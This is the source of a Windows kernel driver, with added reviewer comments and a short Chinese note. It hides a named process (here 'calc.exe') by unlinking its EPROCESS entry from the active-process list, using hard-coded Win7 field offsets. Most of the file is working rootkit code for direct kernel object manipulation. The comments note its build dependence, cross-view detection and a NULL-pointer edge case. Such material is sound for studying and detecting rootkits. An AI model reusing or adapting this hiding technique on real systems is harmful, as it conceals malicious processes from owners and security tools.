/*
 * HideProcess.c — kernel driver that unlinks one process from the
 * EPROCESS.ActiveProcessLinks list using hard-coded field offsets
 * (direct kernel object manipulation).
 *
 * Risk notes for reviewers:
 *  - The offsets below are tied to one OS build (the trailing note says
 *    Win7).  On any other build the reads at these offsets land on
 *    unrelated EPROCESS fields, so the walk dereferences garbage.
 *  - Only this one list is edited.  NOTE(review): other kernel views
 *    (thread lists, PID/handle tables, etc.) still contain the process,
 *    which is why cross-view comparison is the usual way such a
 *    modification is detected.
 *  - Nothing here ever restores the link, and UnloadDriver is empty, so
 *    the list stays modified after the driver unloads.
 */
#ifndef CXX_HIDEPROCESS_H
# include "HideProcess.h"
#endif

/*
 * Raw EPROCESS field offsets for the targeted build.
 * ActiveProcessLinksOffset_EPROCESS: offset of the LIST_ENTRY that links
 * this EPROCESS into the active-process list.
 * ImageFileNameOffset_EPROCESS: offset of the short image-name field.
 */
#ifdef _WIN64
#define ActiveProcessLinksOffset_EPROCESS 0x188
#define ImageFileNameOffset_EPROCESS 0x2e0
#else
#define ActiveProcessLinksOffset_EPROCESS 0x088
#define ImageFileNameOffset_EPROCESS 0x174
#endif

/*
 * Driver entry point.  Registers the unload routine and immediately runs
 * the unlink against the name "calc.exe".  RegisterPath is unused.
 * Always returns STATUS_SUCCESS, even if HideProcess found nothing.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject,PUNICODE_STRING RegisterPath)
{
    // Unload routine for this driver.
    DriverObject->DriverUnload = UnloadDriver;
    HideProcess("calc.exe");
    return STATUS_SUCCESS;
}

/*
 * Unload routine.  Intentionally empty in the original: the entry
 * removed by HideProcess is NOT relinked here, so the modification
 * outlives the driver.
 */
VOID UnloadDriver(PDRIVER_OBJECT DriverObject)
{
}

/*
 * Walk the active-process list starting at the current process and
 * unlink the first EPROCESS whose image name contains szProcessName.
 *
 * szProcessName: substring to look for (strstr match, so any image name
 *                containing it qualifies).  NULL is a no-op.
 *
 * Side effects: prints every image name it visits via DbgPrint (visible
 * in kernel debug output), and calls RemoveEntryList once on a match.
 * NOTE(review): RemoveEntryList presumably only updates the neighbours'
 * pointers and leaves the removed entry's own Flink/Blink pointing at
 * them; nothing here clears or restores that state — confirm for this
 * build.
 */
VOID HideProcess(char* szProcessName)
{
    PLIST_ENTRY ListEntry = NULL;       // list entry of TravelEProcess, set only after advancing (see loop)
    PEPROCESS EProcess = NULL;          // walk start / loop terminator
    char* szName = NULL;
    PEPROCESS TravelEProcess = NULL;    // current node of the walk
    PEPROCESS BadEProcess = NULL;       // node that is skipped (not a real EPROCESS, see below)
    EProcess = IoGetCurrentProcess(); // process current at DriverEntry time; original note: "System.exe"

    if (szProcessName==NULL)
    {
        return;
    }
    if (EProcess==NULL)
    {
        return;
    }
    TravelEProcess = EProcess;

    // Read the second pointer of the LIST_ENTRY (Blink on a 64-bit
    // LIST_ENTRY) and subtract 0x188.  NOTE(review): both the 8 and the
    // 0x188 are x64 literals and do not use the macros above, unlike the
    // Flink step inside the loop.  The result is presumably the address
    // reached through the list head rather than a real EPROCESS; the loop
    // skips it so ImageFileName is never read from it — TODO confirm.
    BadEProcess = (PEPROCESS)((ULONG_PTR)(*((ULONG_PTR*)((ULONG_PTR)EProcess+ActiveProcessLinksOffset_EPROCESS+8)))-0x188);

    do
    {
        if (TravelEProcess!=BadEProcess)
        {
            // Image name field at the hard-coded offset.  strstr assumes it
            // is NUL-terminated; ImageFileName is a short fixed-size field —
            // TODO confirm termination for this build.
            szName = (char*)((ULONG_PTR)TravelEProcess+ImageFileNameOffset_EPROCESS);
            DbgPrint("%s ",szName);   // every visited name is logged to the kernel debugger

            if (strstr(szName,szProcessName)!=NULL)
            {
                // ListEntry lags one step: it is still NULL on the first
                // iteration (TravelEProcess == EProcess) and is only
                // assigned after the advance below, so a match on the very
                // first node would pass NULL here.
                RemoveEntryList(ListEntry);
                break;   // only the first match is unlinked
            }
        }

        // Advance along Flink: the pointer stored at ActiveProcessLinks is
        // the next node's LIST_ENTRY, so subtract the offset to get its
        // EPROCESS; then record that node's LIST_ENTRY for the next check.
        TravelEProcess = (PEPROCESS)((*(ULONG_PTR*)((ULONG_PTR)TravelEProcess+ActiveProcessLinksOffset_EPROCESS))-ActiveProcessLinksOffset_EPROCESS);
        ListEntry = (PLIST_ENTRY)((ULONG_PTR)TravelEProcess+ActiveProcessLinksOffset_EPROCESS);
    }while (TravelEProcess!=EProcess);   // list is circular; stop when back at the start
}
使用断链操作隐藏进程
win7:
0x188 处是 _LIST_ENTRY（ActiveProcessLinks），一个 16 字节的结构体
0x2e0 处存储进程名称（ImageFileName）
winxp同理